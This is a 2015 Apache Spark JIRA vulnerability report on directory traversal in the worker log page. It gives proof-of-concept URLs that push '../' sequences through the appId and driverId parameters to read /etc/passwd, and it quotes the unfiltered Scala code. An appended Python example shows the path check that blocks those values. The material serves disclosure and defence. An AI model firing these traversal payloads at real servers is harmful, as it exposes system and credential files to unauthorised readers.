Posted to issues@spark.apache.org by "0keeTeam (JIRA)" <ji...@apache.org> on 2015/06/03 10:32:49 UTC

[jira] [Created] (SPARK-8073) Directory traversal vulnerability

0keeTeam created SPARK-8073:
-------------------------------

             Summary: Directory traversal vulnerability
                 Key: SPARK-8073
                 URL: https://issues.apache.org/jira/browse/SPARK-8073
             Project: Spark
          Issue Type: Bug
          Components: Deploy, Spark Core, Web UI
    Affects Versions: 1.3.1
         Environment: Centos6.4
            Reporter: 0keeTeam
            Priority: Critical


We are an information security team from the QIHU 360 company, China.
We found a 0day vulnerability in Spark and are writing to apply for a CVE ID. Please refer to the report below. Thanks!

[Team info]
         name: 0keeTeam
         company: QIHU 360 company, China
         email: g-sec-web@360.cn

Details of the vulnerability are as follows:

{color:red}
Poc&Exp:
http://xxx.com/logPage/?appId=../../../../../../../../../../../../../../../&executorId=&logType=etc/passwd
or:
http://xxx.com/logPage/?driverId=../../../../../../../../../../../../../../../&logType=etc/passwd
{color}

*spark-1.3.1\core\src\main\scala\org\apache\spark\deploy\worker\ui\LogPage.scala : Line36:*
{quote}{color:red}// parameters get from GET are not filtered{color}
    val appId = Option(request.getParameter("appId"))
    val executorId = Option(request.getParameter("executorId"))
    val driverId = Option(request.getParameter("driverId"))
    val logType = request.getParameter("logType")
    val offset = Option(request.getParameter("offset")).map(_.toLong)
    val byteLength = Option(request.getParameter("byteLength")).map(_.toInt).getOrElse(defaultBytes)
     ........
    val (logText, startByte, endByte, logLength) = getLog(logDir, logType, offset, byteLength)
{quote}
*and Line125:*
{quote}
  private def getLog(
     ........
      val files = RollingFileAppender.getSortedRolledOverFiles(logDirectory, logType)
     ........
      val logText = Utils.offsetBytes(files, startIndex, endIndex)
{quote}

*spark-1.3.1\core\src\main\scala\org\apache\spark\util\logging\RollingFileAppender.scala : Line152:*
{quote}
  def getSortedRolledOverFiles(directory: String, activeFileName: String): 
     ........
      val file = new File(directory, activeFileName).getAbsoluteFile
     ........
{quote}
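An added example, not code from the report or from Spark itself: a Python model of how the log page above composes a path from the unchecked appId/executorId/logType values, alongside the two checks (an identifier allowlist and a canonical-path containment test) that reject the parameter values shown in the report. The work directory and the allowed identifier character set are assumptions.

```python
"""Added example (not Spark code): models the worker log page path build
and the checks that stop '..' segments from leaving the work directory."""
import os
import re

# Constructed work directory for the demo; the real worker layout is not needed.
WORK_DIR = "/var/lib/spark/work"

# Allowlist for appId/executorId/driverId/logType: no separators, no "..".
# The exact character set is an assumption, not a rule taken from Spark.
SAFE_COMPONENT = re.compile(r"^[A-Za-z0-9._-]+$")


def is_safe_component(value: str) -> bool:
    """Reject empty values, '.', '..' and anything containing a separator."""
    return bool(SAFE_COMPONENT.match(value)) and value not in (".", "..")


def build_log_path(work_dir: str, app_id: str, executor_id: str, log_type: str) -> str:
    """Mirror of the unchecked composition in the report: GET values are joined
    straight under the work directory, so '..' segments walk upward."""
    return os.path.join(work_dir, app_id, executor_id, log_type)


def is_within_work_dir(work_dir: str, path: str) -> bool:
    """Canonicalise both sides (collapses '..' and resolves symlinks) and require
    the candidate to be the work directory itself or something below it."""
    base = os.path.realpath(work_dir)
    candidate = os.path.realpath(path)
    return os.path.commonpath([base, candidate]) == base


def resolve_log_file(work_dir: str, app_id: str, executor_id: str, log_type: str):
    """Return the canonical log path, or None when either check fails.

    The allowlist stops malformed ids before a path is built; the containment
    check is the backstop for anything else (e.g. a symlink pointing outside).
    """
    if not all(is_safe_component(v) for v in (app_id, executor_id, log_type)):
        return None
    path = build_log_path(work_dir, app_id, executor_id, log_type)
    if not is_within_work_dir(work_dir, path):
        return None
    return os.path.realpath(path)


if __name__ == "__main__":
    # The report's PoC values, first unchecked and then through the resolver.
    poc = ("../../../../../../../../../../../../../../../", "", "etc/passwd")
    print("unchecked ->", os.path.realpath(build_log_path(WORK_DIR, *poc)))
    print("checked   ->", resolve_log_file(WORK_DIR, *poc))
    print("valid     ->", resolve_log_file(WORK_DIR, "app-20150603", "0", "stdout"))
```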
